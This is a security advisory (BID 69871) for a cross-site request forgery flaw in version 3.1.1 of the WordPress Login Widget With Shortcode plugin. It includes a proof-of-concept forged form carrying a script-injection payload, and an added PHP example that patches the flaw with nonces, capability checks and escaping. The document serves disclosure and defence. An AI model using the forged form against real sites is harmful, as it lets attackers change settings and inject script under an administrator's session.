WordPress Login Widget With Shortcode 'options-general.php' Cross Site Request Forgery Vulnerability
BID:69871
Info
| Bugtraq ID: | 69871 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 17 2014 12:00AM |
| Updated: | Sep 17 2014 12:00AM |
| Credit: | Tom Adams |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
The Login Widget With Shortcode plugin for WordPress is prone to a cross-site request-forgery vulnerability.
An attacker can exploit this issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
Login Widget With Shortcode 3.1.1 is vulnerable; other versions may also be affected.
Exploit / POC
To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.
The following example data is available:
<form method="POST" action="http://www.example.com/wp-admin/options-general.php?page=login_widget_afo">
<input type="text" name="custom_style_afo" value="&lt;/textarea>&lt;script>alert(1)&lt;/script>">
<input type="text" name="option" value="login_widget_afo_save_settings">
<input type="submit">
</form>
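The PoC form above works because the settings handler accepts any POST that carries the right field names, with nothing binding the request to the logged-in administrator's session. The following is an added example, not the plugin's own code, of how a WordPress options page of this kind is normally protected: a nonce tied to the user's session that a cross-site form cannot supply, a capability check, sanitisation on save, and context-appropriate escaping on output so the `</textarea><script>` payload cannot break out of the element. The field names `custom_style_afo`, `login_widget_afo_save_settings` and `page=login_widget_afo` are taken from the PoC; the function names, nonce action, option key and hook wiring are assumptions made for the example.

```php
<?php
// Added example (not the plugin's own code). Names derived from the advisory's
// PoC: custom_style_afo, login_widget_afo_save_settings, page=login_widget_afo.
// Everything else (function names, nonce action, the "_lwa_nonce" field) is assumed.

// Render the settings form. wp_nonce_field() emits a hidden token bound to the
// current user's session; a form hosted on an attacker's site cannot know it.
function lwa_example_render_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'lwa-example' ), '', array( 'response' => 403 ) );
    }
    $custom_style = get_option( 'custom_style_afo', '' );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="login_widget_afo_save_settings">
        <?php wp_nonce_field( 'login_widget_afo_save_settings', '_lwa_nonce' ); ?>
        <!-- esc_textarea() HTML-encodes the stored value, so a saved
             "</textarea><script>" sequence is shown as text, not parsed. -->
        <textarea name="custom_style_afo" rows="8" cols="60"><?php echo esc_textarea( $custom_style ); ?></textarea>
        <?php submit_button(); ?>
    </form>
    <?php
}

// Handle the POST. The request must come from an administrator AND carry a
// valid nonce; check_admin_referer() calls wp_die() when the nonce is absent
// or invalid, which is exactly the case for the forged form in the PoC.
function lwa_example_save_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'lwa-example' ), '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'login_widget_afo_save_settings', '_lwa_nonce' );

    $raw = isset( $_POST['custom_style_afo'] ) ? wp_unslash( $_POST['custom_style_afo'] ) : '';
    // sanitize_textarea_field() keeps line breaks but strips HTML tags, so
    // "<script>" never reaches the database. Plain CSS (no "<") is untouched.
    $clean = sanitize_textarea_field( $raw );
    update_option( 'custom_style_afo', $clean );

    wp_safe_redirect(
        add_query_arg(
            array( 'page' => 'login_widget_afo', 'updated' => 'true' ),
            admin_url( 'options-general.php' )
        )
    );
    exit;
}
add_action( 'admin_post_login_widget_afo_save_settings', 'lwa_example_save_settings' );

// Front-end output. Inside a <style> element entity encoding does not apply,
// so strip tags here as well: a stored "</style><script>" must not be able to
// terminate the style block even if sanitisation on save is ever bypassed.
function lwa_example_print_custom_css() {
    $css = get_option( 'custom_style_afo', '' );
    if ( '' === $css ) {
        return;
    }
    echo '<style id="lwa-example-custom-css">' . wp_strip_all_tags( $css ) . "</style>\n";
}
add_action( 'wp_head', 'lwa_example_print_custom_css' );
```

The nonce check is the part that addresses the advisory's CSRF class: the browser will still attach the victim's cookies to the attacker's POST, but the request fails before `update_option()` because the token is missing. The escaping and tag stripping address the payload the PoC carries; both are needed, since the stored value is rendered in two different contexts (an HTML textarea and a CSS style block) and each needs its own escaping rule.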
Solution / Fix
Solution:
Updates are available. Please see the references or vendor advisory for more information.